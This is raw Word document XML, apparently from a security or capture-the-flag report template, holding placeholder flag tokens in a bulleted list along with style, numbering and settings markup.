        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006051D3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{FLAG_PSEUTERM_MISC_359867}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57558578" w14:textId="77777777" w:rsidR="006051D3" w:rsidRPr="006051D3" w:rsidRDefault="006051D3" w:rsidP="006051D3">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006051D3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{FLAG_PUBWEBSI_BACK_892356}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167B14B" w14:textId="06EE42FC" w:rsidR="006051D3" w:rsidRPr="006051D3" w:rsidRDefault="006051D3" w:rsidP="006051D3">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006051D3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{FLAG_SHARKNET_SNIF_759871}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6553140F" w14:textId="77777777" w:rsidR="006051D3" w:rsidRPr="006051D3" w:rsidRDefault="006051D3" w:rsidP="006051D3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DDC2CB5" w14:textId="77777777" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F38D6F" w14:textId="77777777" w:rsidR="00D678A8" w:rsidRPr="002355AE" w:rsidRDefault="00D678A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D678A8" w:rsidRPr="002355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C2862" w14:textId="77777777" w:rsidR="00D5093D" w:rsidRDefault="00D5093D" w:rsidP="00E50B77">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1EBB09A9" w14:textId="77777777" w:rsidR="00D5093D" w:rsidRDefault="00D5093D" w:rsidP="00E50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6686" w14:textId="77777777" w:rsidR="00D5093D" w:rsidRDefault="00D5093D" w:rsidP="00E50B77">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5C549BBD" w14:textId="77777777" w:rsidR="00D5093D" w:rsidRDefault="00D5093D" w:rsidP="00E50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F0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BEA3802"/>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E81D07"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B5308B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9B7C6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81BC7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9E5EC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49E8AF4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156706"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="953A7074"/>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F273CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF94779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0E4FD5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3042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7732BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76366BC8"/>
    <w:lvl w:ilvl="0" w:tplc="04070005">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="766" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="53007B68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="282C672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EB6911"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB643BC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470BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43FA33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CF107B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4202D8C"/>
    <w:lvl w:ilvl="0" w:tplc="CD68A0B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="FindingTabl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053407">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="68844890">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1207176580">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="434909306">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="515119947">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1287539913">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="631832663">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1940138384">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1086535285">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1668172138">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="383527803">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="325210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0F"/>
    <w:rsid w:val="00027997"/>
    <w:rsid w:val="000F6F1C"/>
    <w:rsid w:val="00103A9F"/>
    <w:rsid w:val="00105C0C"/>
    <w:rsid w:val="001131B3"/>
    <w:rsid w:val="00131A45"/>
    <w:rsid w:val="00194A65"/>
    <w:rsid w:val="002355AE"/>
    <w:rsid w:val="0035074C"/>
    <w:rsid w:val="00432DEC"/>
    <w:rsid w:val="004375EB"/>
    <w:rsid w:val="0056617F"/>
    <w:rsid w:val="006051D3"/>
    <w:rsid w:val="006051D5"/>
    <w:rsid w:val="006234C2"/>
    <w:rsid w:val="00714C45"/>
    <w:rsid w:val="00723340"/>
    <w:rsid w:val="00746901"/>
    <w:rsid w:val="00832F07"/>
    <w:rsid w:val="008809DD"/>
    <w:rsid w:val="008944EF"/>
    <w:rsid w:val="008F1064"/>
    <w:rsid w:val="00940701"/>
    <w:rsid w:val="00967BAB"/>
    <w:rsid w:val="00B15381"/>
    <w:rsid w:val="00B21094"/>
    <w:rsid w:val="00B43491"/>
    <w:rsid w:val="00BD0B0F"/>
    <w:rsid w:val="00C73D00"/>
    <w:rsid w:val="00C90368"/>
    <w:rsid w:val="00D33221"/>
    <w:rsid w:val="00D50403"/>
    <w:rsid w:val="00D5093D"/>
    <w:rsid w:val="00D678A8"/>
    <w:rsid w:val="00D75BA5"/>
    <w:rsid w:val="00D85809"/>
    <w:rsid w:val="00DB29D8"/>
    <w:rsid w:val="00DF6071"/>
    <w:rsid w:val="00E50B77"/>
    <w:rsid w:val="00E76A10"/>
    <w:rsid w:val="00F21847"/>
    <w:rsid w:val="00F308CB"/>
    <w:rsid w:val="00F724D7"/>
    <w:rsid w:val="00FA5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3B78"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{00133453-559A-4067-BFA0-59E1A10B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5809"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="240" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Century Gothic" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="berschrift2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:link w:val="berschrift2Zchn"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00194A6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D85809"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="24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BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Franklin Gothic Book" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitelZchn">
    <w:name w:val="Titel Zchn"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:link w:val="Titel"/>
    <w:rsid w:val="00BD0B0F"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Franklin Gothic Book" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TitlePage-Version">
    <w:name w:val="Title Page - Version"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="berschrift1Zchn">
    <w:name w:val="Überschrift 1 Zchn"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:link w:val="berschrift1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D85809"/>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Century Gothic" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Verzeichnis1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:b/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Verzeichnis3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="403"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD0B0F"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Verzeichnis2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Spacer">
    <w:name w:val="*Spacer"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="12"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyBlockLabelnonTOC">
    <w:name w:val="*Body Block Label (non TOC)"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Calibri" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableText-Small">
    <w:name w:val="Table Text - Small"/>
    <w:basedOn w:val="Standard"/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Times New Roman" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Table-HeaderText">
    <w:name w:val="Table - Header Text"/>
    <w:basedOn w:val="Standard"/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="berschrift2Zchn">
    <w:name w:val="Überschrift 2 Zchn"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:link w:val="berschrift2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00194A65"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyBlockLine">
    <w:name w:val="*Body Block Line"/>
    <w:basedOn w:val="Spacer"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:after="120"/>
      <w:ind w:left="1620"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="auto"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Finding">
    <w:name w:val="*Finding"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Calibri" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FindingTableLabel">
    <w:name w:val="*Finding Table Label"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:right="-170"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableText">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="Standard"/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="MS Mincho" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="NichtaufgelsteErwhnung">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F1064"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Inhaltsverzeichnisberschrift">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="berschrift1"/>
    <w:next w:val="Standard"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E50B77"/>
    <w:pPr>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="0"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Funotentext">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Standard"/>
    <w:link w:val="FunotentextZchn"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E50B7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0B77"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Funotenzeichen">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E50B77"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BesuchterLink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F308CB"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLVorformatiert">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Standard"/>
    <w:link w:val="HTMLVorformatiertZchn"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00940701"/>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6"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLVorformatiertZchn">
    <w:name w:val="HTML Vorformatiert Zchn"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:link w:val="HTMLVorformatiert"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00940701"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:shd w:val="clear" w:color="auto" w:fill="303841"/>
      <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c01">
    <w:name w:val="c01"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00940701"/>
    <w:rPr>
      <w:color w:val="D8DEE9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tabellenraster">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="NormaleTabelle"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E76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D858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berschrift3Zchn">
    <w:name w:val="Überschrift 3 Zchn"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:link w:val="berschrift3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D85809"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listenabsatz">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Standard"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006234C2"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Beschriftung">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00F21847"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c21">
    <w:name w:val="c21"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00027997"/>
    <w:rPr>
      <w:color w:val="D8DEE9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c11">
    <w:name w:val="c11"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00027997"/>
    <w:rPr>
      <w:color w:val="99C794"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c31">
    <w:name w:val="c31"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00027997"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="EC5F66"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c41">
    <w:name w:val="c41"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00832F07"/>
    <w:rPr>
      <w:color w:val="D8DEE9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c81">
    <w:name w:val="c81"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00832F07"/>
    <w:rPr>
      <w:color w:val="F97B58"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c51">
    <w:name w:val="c51"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00832F07"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="EC5F66"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c61">
    <w:name w:val="c61"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00832F07"/>
    <w:rPr>
      <w:color w:val="99C794"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c71">
    <w:name w:val="c71"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00832F07"/>
    <w:rPr>
      <w:color w:val="A6ACB9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c91">
    <w:name w:val="c91"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00832F07"/>
    <w:rPr>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89905">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="619074567">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="718241469">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="769087234">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
